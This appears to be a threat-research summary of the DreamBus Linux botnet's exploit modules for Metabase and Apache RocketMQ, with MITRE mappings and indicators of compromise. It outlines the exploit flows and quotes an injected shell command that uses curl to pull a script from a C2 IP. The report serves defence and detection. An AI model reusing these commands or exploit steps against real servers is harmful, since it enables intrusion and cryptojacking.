Threat Research

DreamBus Unleashes Metabase Mayhem With New Exploit Module

ZScaler

Zscaler ThreatLabz details technical procedures used by the DreamBus Linux botnet to exploit Metabase (CVE-2023-38646) and Apache RocketMQ (CVE-2023-33246), with modules that scan networks, stage payloads, and execute shell scripts to fetch the main malware and deploy an XMRig Monero miner. The report describes UPX-packed ELF modules with modified headers, scanning of RFC1918 and public ranges, staged JSON and binary payloads for remote command execution, and C2 delivery via onion/tor2web. #DreamBus #Metabase

Keypoints

  • DreamBus is a modular Linux botnet that scans internal RFC1918 ranges and public IP space to find vulnerable services and deploy exploit modules.
  • Recent modules target Metabase (CVE-2023-38646) and Apache RocketMQ (CVE-2023-33246) to achieve remote command execution and stage payloads.
  • Modules are ELF binaries packed with UPX whose magic bytes are modified (e.g., replaced with “.gnu”) to hinder static UPX unpacking.
  • Exploit flow for Metabase: probe port 3000, detect Metabase via response string, write a staged JSON to /tmp/.json[ip], extract setup token with curl+grep, replace placeholder, POST to /api/setup/validate, then run a shell script to download and execute the main module.
  • Exploit flow for RocketMQ: send crafted binary packet to port 10911 invoking an update configuration call (code 25) to set rocketmqHome to a shell command that downloads a script (reketed), which then fetches and runs the main module.
  • Post-exploitation behavior includes creating a module lock file (/tmp/.systemd.3), fetching payloads via DoH/tor/tor2web, and deploying XMRig to mine Monero.

MITRE Techniques

  • [T1046] Network Service Discovery – Scans internal RFC1918 ranges and public IPs looking for services and specific ports (e.g., 3000 for Metabase, 10911 for RocketMQ) (‘…scans internal RFC 1918 ranges 172.16.0.0/12, 192.168.0.0/16, and 10.0.0.0/8 as well as randomly scanning public IP ranges.’).
  • [T1190] Exploit Public-Facing Application – Uses public CVE exploits to gain RCE on Metabase and RocketMQ (‘…Metabase…vulnerable to CVE-2023-38646…’ and ‘…a vulnerability cataloged as CVE-2023-33246…’).
  • [T1110] Brute Force – Attempts credential guessing against Redis, PostgreSQL, and SSH using bundled password lists (‘…Links to the current password lists used by DreamBus to brute force Redis, PostgreSQL, and SSH credentials are provided…’).
  • [T1059] Command and Scripting Interpreter – Executes shell scripts on successful exploitation to download and run the main DreamBus module and miner (‘…executes shell scripts that download the main DreamBus module…’).
  • [T1027] Obfuscated Files or Information – Modifies UPX-packed ELF headers to prevent standard UPX static unpacking (‘…the UPX magic bytes have been replaced with the value .gnu (0x756e672e).’).
  • [T1090] Proxy (C2 via Tor/onion) – Uses .onion and tor2web endpoints to retrieve payloads and C2 communications (‘…ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion’ and references to ‘tor2web’).
  • [T1496] Resource Hijacking – Deploys XMRig to mine Monero on compromised hosts (‘…monetized by mining Monero cryptocurrency using XMRig.’).

Indicators of Compromise

  • [SHA256 Hashes] sample modules – 9f49375ae05c16d80e02c21f178429602f726ce87295b9dfd9458f37956392e3 (Metabase module), b86fa919ab9ebaa3f8ead4f7ef6ee0bb94a3a1b7d9583e99598893f2738a1c71 (RocketMQ module), and 6 more sample hashes.
  • [Domains/IPs] network C2 and mining – ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion (C2), 92.204.243[.]155 (C2 hosting payloads), and 2 more network indicators including 139.59.150[.]7 and p2pool[.]it.
  • [Filenames] host artifacts – /tmp/.systemd.3 (DreamBus module lock file), /tmp/.json[ipaddress] (staged Metabase exploit payload file).
  • [Password lists] brute-force targets – SSH password list and combined PostgreSQL/Redis password list used by DreamBus to attempt credential guesses.

DreamBus exploit modules are UPX-packed ELF binaries with modified UPX magic bytes (recently replaced with “.gnu”) to block static UPX unpacking. Each module scans both internal RFC1918 ranges (172.16.0.0/12, 192.168.0.0/16, 10.0.0.0/8) and random public IPs for services on specific ports, creates a lock file (/tmp/.systemd.3) to enforce a single instance, and contains exploit-specific code that, on success, writes staged payloads to /tmp and executes shell scripts which fetch the main DreamBus module and XMRig miner.

For Metabase (CVE-2023-38646) the module probes port 3000 with GET /api/session/properties and looks for the string “metabase.D” to confirm a Metabase instance. It then writes a staged JSON to /tmp/.json[ip] containing a “token”: “setup-token” placeholder and an “init” field with a Java/trigger that executes a base64-decoded bash payload. The module extracts the real setup token using curl and a grep regex, patches the staged JSON with sed (sed -i “s/setup-token/$setup_token/g”), POSTs it to /api/setup/validate, removes the staged file, and if successful runs a downloaded shell script which uses DoH and tor/tor2web endpoints to retrieve and execute the main ELF payload.

The RocketMQ module targets port 10911 by sending a crafted binary packet that invokes the configuration update (code 25) without auth and sets rocketmqHome to a shell command: e.g., ‘-c $@|sh . echo curl -fsSkLA- 92.204.243.155:8080/roket -o reketed;’. On vulnerable servers this writes a ‘reketed’ script which, when run, follows the same retrieval pattern (curl/DoH/tor2web), writes a temporary executable, and launches the DreamBus main module and miner. Detection should focus on the listed hashes, C2 endpoints (.onion and IPs like 92.204.243.155), the /tmp/.json[ip] staged files, and the persistent lock file /tmp/.systemd.3.

Read more: https://www.zscaler.com/blogs/security-research/dreambus-unleashes-metabase-mayhem-new-exploit-module

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint